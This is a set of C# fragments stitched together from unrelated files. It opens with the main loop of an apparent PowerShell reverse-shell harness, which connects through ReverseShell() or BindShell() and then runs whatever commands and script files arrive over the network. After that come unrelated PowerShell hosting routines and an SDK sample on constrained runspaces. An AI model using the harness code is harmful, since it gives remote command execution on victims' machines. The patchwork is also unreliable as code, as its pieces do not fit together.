bool MULTILINE_FLAG = false;
bool REMOTEFILE_FLAG = false;
// Buffer for reading data
byte[] bytes;
// Holds string representation of data send over the wire
string data = "";
// Used to accumulate data from imported file
string data_chunk = "";
// Replace ReverseShell() with BindShell() as needed
this.client = ReverseShell();
this.stream = client.GetStream();
using (this.ps = PowerShell.Create())
{
while (!this.ShouldExit)
{
if (stream.CanRead)
{
bytes = new byte[client.ReceiveBufferSize];
int i;
// Loop to receive all the data sent by the client.
while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
{
// Deal with multiline script by prompting for more input (e.g. >>)
if (MULTILINE_FLAG)
{
data_chunk = System.Text.Encoding.ASCII.GetString(bytes, 0, i).Trim();
// Check to see if the user wants to break out of multiline
if (data_chunk == HARNESS_CMD_CHAR + USER_BREAK)
{
ProcessPS(data);
MULTILINE_FLAG = false;
data = "";
}
else
{
data += data_chunk;
}
}
else if (REMOTEFILE_FLAG)
{
// Need to check and see if the script is done transfering
data_chunk = System.Text.Encoding.ASCII.GetString(bytes, 0, i).Trim();
if (data_chunk.ToLower() == ENDFILE_TAG)
{
Debug.WriteLine("[DEBUG] File received");
if (IsValid(data))
{
ProcessPS(data);
}
else
{
this.host.UI.WriteLine("[!] Transfer errors found. Try import again");
}
data = "";
REMOTEFILE_FLAG = false;
}
else
{
data += data_chunk;
data_chunk = "";
}
}
else
{
data = System.Text.Encoding.ASCII.GetString(bytes, 0, i).Trim();
if (data.ToLower() == "exit" || data.ToLower() == "quit")
{
break;
}
if (data.ToLower() == BEGINFILE_TAG)
{
Debug.WriteLine("[DEBUG] Receiving File");
REMOTEFILE_FLAG = true;
data = "";
}
if (data != "" && !REMOTEFILE_FLAG)
{
Debug.WriteLine("[DEBUG] Command Received: " + data.ToString());
// ProcessLocal is reserved for non-PS Harness commands that require special handling
if (data[0] == HARNESS_CMD_CHAR)
{
ProcessLocal(data);
data = "";
}
}
}
// Determine how we deal with the data received
if (!REMOTEFILE_FLAG)
{
if (IsValid(data))
{
ProcessPS(data);
data = "";
MULTILINE_FLAG = false;
}
else
{
Debug.WriteLine("[DEBUG] Incomplete script or parse error");
MULTILINE_FLAG = true;
this.host.UI.Write(">> ");
}
}
}
// Shutdown and end connection
client.Close();
Debug.WriteLine("[DEBUG] Connection Closed");
break;
}
}
}
}
private JobSourceAdapter GetJobSourceAdapter(JobDefinition definition)
{
string jobSourceAdapterTypeName;
JobSourceAdapter adapter;
if (!string.IsNullOrEmpty(definition.JobSourceAdapterTypeName))
{
jobSourceAdapterTypeName = definition.JobSourceAdapterTypeName;
}
else
{
if (definition.JobSourceAdapterType == null)
{
throw new InvalidOperationException(ResourceManagerCache.GetResourceString("RemotingErrorIdStrings", "JobSourceAdapterNotFound"));
}
jobSourceAdapterTypeName = definition.JobSourceAdapterType.Name;
}
bool flag = false;
lock (this._syncObject)
{
flag = this._sourceAdapters.TryGetValue(jobSourceAdapterTypeName, out adapter);
}
if (flag)
{
return(adapter);
}
if (string.IsNullOrEmpty(definition.ModuleName))
{
throw new InvalidOperationException(ResourceManagerCache.GetResourceString("RemotingErrorIdStrings", "JobSourceAdapterNotFound"));
}
Exception innerException = null;
try
{
InitialSessionState initialSessionState = InitialSessionState.CreateDefault2();
initialSessionState.Commands.Clear();
initialSessionState.Formats.Clear();
initialSessionState.Commands.Add(new SessionStateCmdletEntry("Import-Module", typeof(ImportModuleCommand), null));
using (PowerShell shell = PowerShell.Create(initialSessionState))
{
shell.AddCommand("Import-Module");
shell.AddParameter("Name", definition.ModuleName);
shell.Invoke();
if (shell.ErrorBuffer.Count > 0)
{
innerException = shell.ErrorBuffer[0].Exception;
}
}
}
catch (RuntimeException exception2)
{
innerException = exception2;
}
catch (InvalidOperationException exception3)
{
innerException = exception3;
}
catch (ScriptCallDepthException exception4)
{
innerException = exception4;
}
catch (SecurityException exception5)
{
innerException = exception5;
}
catch (ThreadAbortException exception6)
{
innerException = exception6;
}
if (innerException != null)
{
throw new InvalidOperationException(ResourceManagerCache.GetResourceString("RemotingErrorIdStrings", "JobSourceAdapterNotFound"), innerException);
}
return(this.AssertAndReturnJobSourceAdapter(jobSourceAdapterTypeName));
}
/// <summary>
/// A helper class that builds and executes a pipeline that writes to the default output path, depending on the value of <paramref name="quiet"/>. Any
/// exceptions that are thrown are just passed to the caller.
/// </summary>
/// <param name="command">The script to run.</param>
/// <param name="input">Any input arguments to pass to the script. If null then nothing is passed in.</param>
/// <param name="quiet">Whether or not the results of the call should be written to the console.</param>
/// <returns>The results of the call to _currentPowerShell.<see cref="PowerShell.Invoke()"/>.</returns>
protected Collection <PSObject> ExecuteHelper(string command, object input, bool quiet = false)
{
// Ignore empty command lines.
if (String.IsNullOrEmpty(command))
{
return(null);
}
lock (_executionLock)
{
// Create the pipeline object and make it available to the Ctrl-C handle through the _currentPowerShell instance variable.
lock (_instanceLock)
{
_currentPowerShell = Shell.Create();
}
// Create a pipeline for this execution, and then place the result in the _currentPowerShell variable so it is available to be stopped.
try
{
_currentPowerShell.Runspace = Runspace;
_currentPowerShell.AddScript(command);
if (!quiet)
{
// Add the default outputter to the end of the pipe and then call the MergeMyResults method to merge the output and error streams from
// the pipeline. This will result in the output being written using the PSHost and PSHostUserInterface classes instead of returning
// objects to the host application.
_currentPowerShell.AddCommand("out-default");
_currentPowerShell.Commands.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
}
// If there is any input pass it in, otherwise just invoke the the pipeline.
if (input != null)
{
return(_currentPowerShell.Invoke(
new object[]
{
input
}));
}
else
{
return(_currentPowerShell.Invoke());
}
}
finally
{
// Dispose the PowerShell object and set _currentPowerShell to null. It is locked because _currentPowerShell may be accessed by the Ctrl-C
// handler.
lock (_instanceLock)
{
if (_currentPowerShell != null)
{
_currentPowerShell.Dispose();
_currentPowerShell = null;
}
}
}
}
}
/// <summary>
/// This sample uses the ProxyCommand class to create a proxy command that
/// calls an existing cmdlet, but restricts the set of available parameters.
/// The proxy command is then added to an intial session state that is used to
/// create a contrained runspace. This means that the user can access the cmdlet
/// through the proxy command.
/// </summary>
/// <remarks>
/// This sample demonstrates the following:
/// 1. Creating a CommandMetadata object that describes the metadata of an
/// existing cmdlet.
/// 2. Modifying the cmdlet metadata to remove a parameter of the cmdlet.
/// 3. Adding the cmdlet to an initial session state and making it private.
/// 4. Creating a proxy function that calls the existing cmdlet, but exposes
/// only a restricted set of parameters.
/// 6. Adding the proxy function to the initial session state.
/// 7. Calling the private cmdlet and the proxy function to demonstrate the
/// constrained runspace.
/// </remarks>
private static void Main()
{
// Create a default intial session state. The default inital session state
// includes all the elements that are provided by Windows PowerShell.
InitialSessionState iss = InitialSessionState.CreateDefault();
// Add the get-proc cmdlet to the initial session state.
SessionStateCmdletEntry cmdletEntry = new SessionStateCmdletEntry("get-proc", typeof(GetProcCommand), null);
iss.Commands.Add(cmdletEntry);
// Make the cmdlet private so that it is not accessable.
cmdletEntry.Visibility = SessionStateEntryVisibility.Private;
// Set the language mode of the intial session state to NoLanguge to
//prevent users from using language features. Only the invocation of
// public commands is allowed.
iss.LanguageMode = PSLanguageMode.NoLanguage;
// Create the proxy command using cmdlet metadata to expose the
// get-proc cmdlet.
CommandMetadata cmdletMetadata = new CommandMetadata(typeof(GetProcCommand));
// Remove one of the parameters from the command metadata.
cmdletMetadata.Parameters.Remove("Name");
// Generate the body of a proxy function that calls the original cmdlet,
// but does not have the removed parameter.
string bodyOfProxyFunction = ProxyCommand.Create(cmdletMetadata);
// Add the proxy function to the initial session state. The name of the proxy
// function can be the same as the name of the cmdlet, but to clearly
// demonstrate that the original cmdlet is not available a different name is
// used for the proxy function.
iss.Commands.Add(new SessionStateFunctionEntry("get-procProxy", bodyOfProxyFunction));
// Create the constrained runspace using the intial session state.
using (Runspace myRunspace = RunspaceFactory.CreateRunspace(iss))
{
myRunspace.Open();
// Call the private cmdlet to demonstrate that it is not available.
try
{
using (PowerShell powershell = PowerShell.Create())
{
powershell.Runspace = myRunspace;
powershell.AddCommand("get-proc").AddParameter("Name", "*explore*");
powershell.Invoke();
}
}
catch (CommandNotFoundException e)
{
System.Console.WriteLine(
"Invoking 'get-proc' failed as expected: {0}: {1}",
e.GetType().FullName,
e.Message);
}
// Call the proxy function to demonstrate that the -Name parameter is
// not available.
try
{
using (PowerShell powershell = PowerShell.Create())
{
powershell.Runspace = myRunspace;
powershell.AddCommand("get-procProxy").AddParameter("Name", "idle");
powershell.Invoke();
}
}
catch (ParameterBindingException e)
{
System.Console.WriteLine(
"\nInvoking 'get-procProxy -Name idle' failed as expected: {0}: {1}",
e.GetType().FullName,
e.Message);
}
// Call the proxy function to demonstrate that it calls into the
// private cmdlet to retrieve the processes.
using (PowerShell powershell = PowerShell.Create())
{
powershell.Runspace = myRunspace;
powershell.AddCommand("get-procProxy");
List <Process> processes = new List <Process>(powershell.Invoke <Process>());
System.Console.WriteLine(
"\nInvoking the get-procProxy function called into the get-proc cmdlet and returned {0} processes",
processes.Count);
}
// Close the runspace to release resources.
myRunspace.Close();
}
System.Console.WriteLine("Hit any key to exit...");
System.Console.ReadKey();
}
